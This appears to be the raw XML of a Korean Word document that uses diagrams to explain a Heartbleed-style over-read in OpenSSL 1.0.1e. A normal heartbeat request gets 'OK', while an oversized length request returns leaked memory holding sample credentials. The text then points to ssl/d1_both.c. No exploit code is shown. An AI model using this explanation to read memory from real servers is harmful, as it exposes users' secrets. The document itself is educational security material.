                          <v:shape id="말풍선: 사각형 131" o:spid="_x0000_s1028" type="#_x0000_t61" style="position:absolute;left:0;text-align:left;margin-left:143.25pt;margin-top:2.1pt;width:125.7pt;height:5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" adj="945,24750" fillcolor="black [3213]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="692DDE50" w14:textId="5B0C380D" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:hint="eastAsia"/>
                                    </w:rPr>
                                    <w:t>서버 응답가능한지?</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="7ECF2322" w14:textId="4A3608CC" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:hint="eastAsia"/>
                                    </w:rPr>
                                    <w:t>가능하면 2글자로 응답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0587D"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e</w:t>
                  </w:r>
                  <w:r w:rsidR="00B0587D"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x1) </w:t>
                  </w:r>
                  <w:r w:rsidR="00B0587D"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정상적인 상황</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3EE7B3B0" w14:textId="14B9033F" w:rsidR="00B0587D" w:rsidRDefault="00B0587D" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="44DB0FC5" w14:textId="38C11398" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="410E1609" w14:textId="77777777" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="7E98479E" w14:textId="6657535F" w:rsidR="00B0587D" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E1A04D0" wp14:editId="73F653E2">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>2120900</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>93345</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="1146175" cy="177165"/>
                            <wp:effectExtent l="0" t="19050" r="34925" b="32385"/>
                            <wp:wrapNone/>
                            <wp:docPr id="127" name="화살표: 오른쪽 1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6175" cy="177165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88EF24E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화살표: 오른쪽 127" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;left:0;text-align:left;margin-left:167pt;margin-top:7.35pt;width:90.25pt;height:13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" adj="19931" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
                        </w:pict>
                      </mc:Fallback>
                    </mc:AlternateContent>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5591DD75" wp14:editId="4BFD060E">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>467995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1323340" cy="354330"/>
                            <wp:effectExtent l="0" t="0" r="10160" b="26670"/>
                            <wp:wrapNone/>
                            <wp:docPr id="123" name="직사각형 1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23340" cy="35433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5C37E2F" w14:textId="7FC637D1" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="00B0587D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C</w:t>
                                        </w:r>
                                        <w:r>
                                          <w:t>lien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591DD75" id="직사각형 123" o:spid="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:36.85pt;margin-top:4.3pt;width:104.2pt;height:27.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" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="75C37E2F" w14:textId="7FC637D1" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="00B0587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  <w:r>
                                    <w:t>lient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D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AA5846C" wp14:editId="44DE11CA">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>3497580</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>68580</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="1678305" cy="368300"/>
                            <wp:effectExtent l="0" t="0" r="17145" b="12700"/>
                            <wp:wrapNone/>
                            <wp:docPr id="125" name="사각형: 둥근 모서리 1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78305" cy="3683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B324AC7" w14:textId="246C6294" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                        <w:pPr>
                                          <w:jc w:val="center"/>
                                        </w:pPr>
                                        <w:r>
                                          <w:t>SERV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AA5846C" id="사각형: 둥근 모서리 125" o:spid="_x0000_s1030" style="position:absolute;left:0;text-align:left;margin-left:275.4pt;margin-top:5.4pt;width:132.15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" fillcolor="#ffc000 [3207]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                            <v:stroke joinstyle="miter"/>
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="4B324AC7" w14:textId="246C6294" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:t>SERVER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  <w:p w14:paraId="3FB8C6BE" w14:textId="39E73E00" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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8B7EB67" wp14:editId="165D4FE5">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>212280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1146175" cy="177165"/>
                            <wp:effectExtent l="19050" t="19050" r="15875" b="32385"/>
                            <wp:wrapNone/>
                            <wp:docPr id="128" name="화살표: 오른쪽 1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146175" cy="177165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F0D16A" id="화살표: 오른쪽 128" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;left:0;text-align:left;margin-left:167.15pt;margin-top:8.25pt;width:90.25pt;height:13.9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" adj="19931" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
                        </w:pict>
                      </mc:Fallback>
                    </mc:AlternateContent>
                  </w:r>
                </w:p>
                <w:p w14:paraId="35A66C1B" w14:textId="1006B13B" w:rsidR="00B0587D" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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778684C6" wp14:editId="14CED20B">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>2721610</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>153670</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="408940" cy="333375"/>
                            <wp:effectExtent l="0" t="76200" r="372110" b="28575"/>
                            <wp:wrapNone/>
                            <wp:docPr id="134" name="말풍선: 사각형 1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3248167" y="7309229"/>
                                      <a:ext cx="408940" cy="333375"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="wedgeRectCallout">
                                      <a:avLst>
                                        <a:gd name="adj1" fmla="val 130944"/>
                                        <a:gd name="adj2" fmla="val -63934"/>
                                      </a:avLst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3D642D9" w14:textId="7A084EF9" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                        <w:r>
                                          <w:t>OK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8684C6" id="말풍선: 사각형 134" o:spid="_x0000_s1031" type="#_x0000_t61" style="position:absolute;left:0;text-align:left;margin-left:214.3pt;margin-top:12.1pt;width:32.2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" adj="39084,-3010" fillcolor="black [3213]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="53D642D9" w14:textId="7A084EF9" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                  <w:r>
                                    <w:t>OK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27656620" w14:textId="09716D4D" w:rsidR="00B0587D" w:rsidRDefault="00B0587D" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="594C3E5A" w14:textId="7FBA25BE" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="08A2BCB5" w14:textId="303E7C3E" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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6A2EDC4C" wp14:editId="5D5CBF45">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>1779905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1610360" cy="654685"/>
                            <wp:effectExtent l="19050" t="0" r="27940" b="145415"/>
                            <wp:wrapNone/>
                            <wp:docPr id="135" name="말풍선: 사각형 1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2306472" y="7765576"/>
                                      <a:ext cx="1610360" cy="654685"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="wedgeRectCallout">
                                      <a:avLst>
                                        <a:gd name="adj1" fmla="val -47217"/>
                                        <a:gd name="adj2" fmla="val 66669"/>
                                      </a:avLst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C44B0B0" w14:textId="77777777" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                        <w:r>
                                          <w:rPr>
                                            <w:rFonts w:hint="eastAsia"/>
                                          </w:rPr>
                                          <w:t>서버 응답가능한지?</w:t>
                                        </w:r>
                                      </w:p>
                                      <w:p w14:paraId="023B2A15" w14:textId="33D1DE4E" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                        <w:r>
                                          <w:rPr>
                                            <w:rFonts w:hint="eastAsia"/>
                                          </w:rPr>
                                          <w:t>가능하면 5</w:t>
                                        </w:r>
                                        <w:r>
                                          <w:t>0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글자로 응답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2EDC4C" id="말풍선: 사각형 135" o:spid="_x0000_s1032" type="#_x0000_t61" style="position:absolute;left:0;text-align:left;margin-left:140.15pt;margin-top:5.05pt;width:126.8pt;height:51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" adj="601,25201" fillcolor="black [3213]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="4C44B0B0" w14:textId="77777777" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:hint="eastAsia"/>
                                    </w:rPr>
                                    <w:t>서버 응답가능한지?</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="023B2A15" w14:textId="33D1DE4E" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:hint="eastAsia"/>
                                    </w:rPr>
                                    <w:t>가능하면 5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글자로 응답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134E4227" w14:textId="66BE1CF3" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="6A544681" w14:textId="4F99E704" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="0070593F">
                  <w:pPr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ex2) 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취약점 활용</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3E21B834" w14:textId="2849846A" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="0070593F">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="2EA4679A" w14:textId="24213725" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="0070593F">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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46F77866" wp14:editId="4A229AA6">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>2137410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1146175" cy="177165"/>
                            <wp:effectExtent l="0" t="19050" r="34925" b="32385"/>
                            <wp:wrapNone/>
                            <wp:docPr id="129" name="화살표: 오른쪽 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6175" cy="177165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FDD9BE" id="화살표: 오른쪽 129" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;left:0;text-align:left;margin-left:168.3pt;margin-top:2.5pt;width:90.25pt;height:1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" adj="19931" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
                        </w:pict>
                      </mc:Fallback>
                    </mc:AlternateContent>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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17C878CD" wp14:editId="2C93B151">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>3500120</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>48260</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="1678305" cy="368300"/>
                            <wp:effectExtent l="0" t="0" r="17145" b="12700"/>
                            <wp:wrapNone/>
                            <wp:docPr id="126" name="사각형: 둥근 모서리 1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78305" cy="3683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384E1CF" w14:textId="77777777" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                        <w:pPr>
                                          <w:jc w:val="center"/>
                                        </w:pPr>
                                        <w:r>
                                          <w:t>SERV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17C878CD" id="사각형: 둥근 모서리 126" o:spid="_x0000_s1033" style="position:absolute;left:0;text-align:left;margin-left:275.6pt;margin-top:3.8pt;width:132.15pt;height:2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" fillcolor="#ffc000 [3207]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                            <v:stroke joinstyle="miter"/>
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="5384E1CF" w14:textId="77777777" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:t>SERVER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rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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24BCC613" wp14:editId="39063031">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>402590</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>60960</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="1323340" cy="354330"/>
                            <wp:effectExtent l="0" t="0" r="10160" b="26670"/>
                            <wp:wrapNone/>
                            <wp:docPr id="124" name="직사각형 1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23340" cy="35433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BD79C31" w14:textId="77777777" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F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C</w:t>
                                        </w:r>
                                        <w:r>
                                          <w:t>lien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4BCC613" id="직사각형 124" o:spid="_x0000_s1034" style="position:absolute;left:0;text-align:left;margin-left:31.7pt;margin-top:4.8pt;width:104.2pt;height:2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" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="2BD79C31" w14:textId="77777777" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593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  <w:r>
                                    <w:t>lient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74274813" w14:textId="034ECCC3" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="0070593F">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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3307E935" wp14:editId="3D739161">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>2124710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1146175" cy="177165"/>
                            <wp:effectExtent l="19050" t="19050" r="15875" b="32385"/>
                            <wp:wrapNone/>
                            <wp:docPr id="130" name="화살표: 오른쪽 1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146175" cy="177165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411026" id="화살표: 오른쪽 130" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;left:0;text-align:left;margin-left:167.3pt;margin-top:6pt;width:90.25pt;height:13.9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" adj="19931" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
                        </w:pict>
                      </mc:Fallback>
                    </mc:AlternateContent>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2204E588" w14:textId="00A63E78" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="0070593F">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="30E66A26" w14:textId="04B72B2F" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="0070593F">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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71029DD5" wp14:editId="159D1E51">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>1738630</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>69850</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="2306320" cy="767715"/>
                            <wp:effectExtent l="0" t="171450" r="17780" b="13335"/>
                            <wp:wrapNone/>
                            <wp:docPr id="136" name="말풍선: 사각형 1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2265528" y="9044769"/>
                                      <a:ext cx="2306320" cy="767715"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="wedgeRectCallout">
                                      <a:avLst>
                                        <a:gd name="adj1" fmla="val 37994"/>
                                        <a:gd name="adj2" fmla="val -70720"/>
                                      </a:avLst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BD493E3" w14:textId="4382F9C1" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                        <w:r>
                                          <w:t>OK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에러가발생했습니다사용자정보[</w:t>
                                        </w:r>
                                        <w:proofErr w:type="spellStart"/>
                                        <w:proofErr w:type="gramStart"/>
                                        <w:r>
                                          <w:t>ID:SecuirtyTEAM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t>/PW:SECURITY]ERROREXCU…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029DD5" id="말풍선: 사각형 136" o:spid="_x0000_s1035" type="#_x0000_t61" style="position:absolute;left:0;text-align:left;margin-left:136.9pt;margin-top:5.5pt;width:181.6pt;height:60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" adj="19007,-4476" fillcolor="black [3213]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="6BD493E3" w14:textId="4382F9C1" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                  <w:r>
                                    <w:t>OK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에러가발생했습니다사용자정보[</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r>
                                    <w:t>ID:SecuirtyTEAM</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r>
                                    <w:t>/PW:SECURITY]ERROREXCU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1283022F" w14:textId="085CC056" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="0070593F">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="25141D18" w14:textId="5DEECFBB" w:rsidR="0070593F" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="2DA421AD" w14:textId="0CACB1DB" w:rsidR="00A658C8" w:rsidRDefault="00A658C8" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="582FE763" w14:textId="40CCB015" w:rsidR="00A658C8" w:rsidRDefault="00A658C8" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="078BFDC8" w14:textId="2093A791" w:rsidR="00A658C8" w:rsidRDefault="00A658C8" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="5B902B35" w14:textId="726655C2" w:rsidR="00A658C8" w:rsidRDefault="00A658C8" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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</w:p>
                <w:p w14:paraId="5AF4EB23" w14:textId="40F5394B" w:rsidR="00B5740D" w:rsidRDefault="00B5740D" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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이렇게 되는 이유는 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/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ssl</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/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소스코드 분석을 통해서 확인할 수 있다.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1AA3D022" w14:textId="34136DE7" w:rsidR="00B5740D" w:rsidRDefault="00B5740D" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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해당 소스코드는 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openssl-1.0.1e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에서 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/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ssl</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/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&gt; d1_both.c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에서 확인할 수 있다.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="23605E3F" w14:textId="58FDC4D7" w:rsidR="00B5740D" w:rsidRDefault="007F72A1" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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/>
                      <w:b/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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1BB4DE62" wp14:editId="47A0C85E">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>573405</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>3567430</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="303530" cy="332105"/>
                            <wp:effectExtent l="0" t="0" r="20320" b="10795"/>
                            <wp:wrapNone/>
                            <wp:docPr id="67" name="Text Box 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3530" cy="3321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1B16853" w14:textId="6CDC2EB2" w:rsidR="007F72A1" w:rsidRDefault="007F72A1">
                                        <w:r>
                                          <w:t>2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BB4DE62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67" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:45.15pt;margin-top:280.9pt;width:23.9pt;height:26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" fillcolor="#ffc000" strokeweight=".5pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="51B16853" w14:textId="6CDC2EB2" w:rsidR="007F72A1" w:rsidRDefault="007F72A1">
                                  <w:r>
                                    <w:t>2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D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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48B83796" wp14:editId="7E3387CD">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>561975</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>4610735</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="303530" cy="332105"/>
                            <wp:effectExtent l="0" t="0" r="20320" b="10795"/>
                            <wp:wrapNone/>
                            <wp:docPr id="68" name="Text Box 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3530" cy="3321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1B559B33" w14:textId="346316EB" w:rsidR="007F72A1" w:rsidRDefault="007F72A1">
                                        <w:r>
                                          <w:t>3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B83796" id="Text Box 68" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:44.25pt;margin-top:363.05pt;width:23.9pt;height:2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" fillcolor="#ffc000" strokeweight=".5pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="1B559B33" w14:textId="346316EB" w:rsidR="007F72A1" w:rsidRDefault="007F72A1">
                                  <w:r>
                                    <w:t>3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D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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5C5DA579" wp14:editId="19EDB285">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>560070</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>5178425</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="303530" cy="332105"/>
                            <wp:effectExtent l="0" t="0" r="20320" b="10795"/>
                            <wp:wrapNone/>
                            <wp:docPr id="69" name="Text Box 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3530" cy="3321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6B70355D" w14:textId="4E0A9F98" w:rsidR="007F72A1" w:rsidRDefault="007F72A1">
                                        <w:r>
                                          <w:t>4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5DA579" id="Text Box 69" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:44.1pt;margin-top:407.75pt;width:23.9pt;height:2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" fillcolor="#ffc000" strokeweight=".5pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="6B70355D" w14:textId="4E0A9F98" w:rsidR="007F72A1" w:rsidRDefault="007F72A1">
                                  <w:r>
                                    <w:t>4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D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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20CD2A68" wp14:editId="4EE65349">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>143510</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>2286635</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="303530" cy="332105"/>
                            <wp:effectExtent l="0" t="0" r="20320" b="10795"/>
                            <wp:wrapNone/>
                            <wp:docPr id="66" name="Text Box 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3530" cy="3321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394D91FD" w14:textId="38BACD8D" w:rsidR="007F72A1" w:rsidRDefault="007F72A1">
                                        <w:r>
                                          <w:rPr>
                                            <w:rFonts w:hint="eastAsia"/>
                                          </w:rPr>
                                          <w:t>1</w:t>
                                        </w:r>
                                        <w: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0CD2A68" id="Text Box 66" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:11.3pt;margin-top:180.05pt;width:23.9pt;height:26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" fillcolor="#ffc000" strokeweight=".5pt">
                            <v:textbox>
                              <w:txbxContent>
                                <w:p w14:paraId="394D91FD" w14:textId="38BACD8D" w:rsidR="007F72A1" w:rsidRDefault="007F72A1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9706E0">
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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 wp14:anchorId="56341233" wp14:editId="7515EF7C">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>516890</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>2352675</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="462915" cy="218440"/>
                            <wp:effectExtent l="19050" t="19050" r="13335" b="10160"/>
                            <wp:wrapNone/>
                            <wp:docPr id="65" name="직사각형 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15" cy="21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D9F12E" id="직사각형 65" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:40.7pt;margin-top:185.25pt;width:36.45pt;height:17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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                        </w:pict>
                      </mc:Fallback>
                    </mc:AlternateContent>
                  </w:r>
                  <w:r w:rsidR="009706E0">
                    <w:rPr>
                      <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                      <w:b/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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 wp14:anchorId="38193EE6" wp14:editId="65914B53">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>956310</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>5238115</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="1654810" cy="229870"/>
                            <wp:effectExtent l="19050" t="19050" r="21590" b="17780"/>
                            <wp:wrapNone/>
                            <wp:docPr id="64" name="직사각형 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54810" cy="229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CCE237" id="직사각형 64" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:75.3pt;margin-top:412.45pt;width:130.3pt;height:18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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                        </w:pict>
                      </mc:Fallback>
                    </mc:AlternateContent>
                  </w:r>
                  <w:r w:rsidR="009706E0">
                    <w:rPr>
